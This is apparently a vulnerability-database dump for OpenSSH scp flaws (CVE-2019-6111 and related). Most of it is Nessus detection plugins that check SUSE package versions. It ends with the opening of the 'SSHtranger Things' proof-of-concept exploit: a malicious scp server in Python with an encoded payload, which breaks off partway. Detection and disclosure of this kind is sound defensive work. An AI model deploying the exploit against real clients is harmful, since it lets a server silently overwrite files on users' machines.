value:\"p-cpe:/a:novell:suse_linux:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-cavs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-askpass-gnome-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-cavs-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-cavs-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-debugsource-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-fips-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-helpers-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"openssh-helpers-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-askpass-gnome-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-cavs-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-cavs-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-debuginfo-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-debugsource-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-helpers-7.6p1-9.13.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"openssh-helpers-debuginfo-7.6p1-9.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-03-18T03:04:06", "description": "This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-22T00:00:00", "title": "SUSE SLES12 Security Update : openssh (SUSE-SU-2019:0125-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-22T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2019-0125-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121295", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0125-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121295);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"SUSE SLES12 Security Update : openssh (SUSE-SU-2019:0125-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-20685/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6109/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6111/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190125-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8367f10f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2019-125=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2019-125=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debugsource-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-fips-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debuginfo-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debugsource-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-fips-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-6.6p1-54.26.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-debuginfo-6.6p1-54.26.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T14:59:16", "description": "This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-22T00:00:00", "title": "SUSE SLES11 Security Update : openssh (SUSE-SU-2019:13931-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-22T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-fips"], "id": "SUSE_SU-2019-13931-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:13931-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121306);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"SUSE SLES11 Security Update : openssh (SUSE-SU-2019:13931-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-20685/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6109/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6111/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-201913931-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af257c04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-openssh-13931=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-openssh-13931=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-6.6p1-36.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-askpass-gnome-6.6p1-36.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-fips-6.6p1-36.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"openssh-helpers-6.6p1-36.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-01-19T02:49:07", "description": "", "published": "2019-01-18T00:00:00", "type": "packetstorm", "title": "SSHtranger Things SCP Client File Issue", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-18T00:00:00", "id": "PACKETSTORM:151227", "href": "https://packetstormsecurity.com/files/151227/SSHtranger-Things-SCP-Client-File-Issue.html", "sourceData": "`# Exploit Title: SSHtranger Things \n# Date: 2019-01-17 \n# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com> \n# Vendor Homepage: https://www.openssh.com/ \n# Software Link: [download link if available] \n# Version: OpenSSH 7.6p1 \n# Tested on: Ubuntu 18.04.1 LTS \n# CVE : CVE-2019-6111, CVE-2019-6110 \n \n''' \nTitle: SSHtranger Things \nAuthor: Mark E. Haase <mhaase@hyperiongray.com> \nHomepage: https://www.hyperiongray.com \nDate: 2019-01-17 \nCVE: CVE-2019-6111, CVE-2019-6110 \nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt \nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 \n \nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be \nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko` \npackage. \n \nThe server listens on port 2222. It accepts any username and password, and it \ngenerates a new host key every time you run it. \n \n$ python3 sshtranger_things.py \n \nDownload a file using a vulnerable client. The local path must be a dot: \n \n$ scp -P 2222 foo@localhost:test.txt . \nThe authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established. \nRSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w. \nAre you sure you want to continue connecting (yes/no)? yes \nWarning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts. \nfoo@localhost's password: \ntest.txt 100% 32 0.7KB/s 00:00 \n \nThe file you requested (e.g. test.txt) will be saved in your current directory. \nIf your client is vulnerable, you will have an additional file \"exploit.txt\" \ncreated in your current directory. \n \n$ cat test.txt \nThis is the file you requested. \n$ cat exploit.txt \nSSHtranger Things \n \nThe interesting code is in ScpServer.send_file(). \n''' \nimport base64 \nimport gzip \nimport logging \nimport paramiko \nimport paramiko.rsakey \nimport socket \nimport threading \n \nlogging.basicConfig(level=logging.INFO) \n \ndummy = 'This is the file you requested.\\n' \npayload = gzip.decompress(base64.b64decode( \nb'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46' \nb'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA' \nb'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7' \nb'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d' \nb'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM' \nb'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz' \nb'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4' 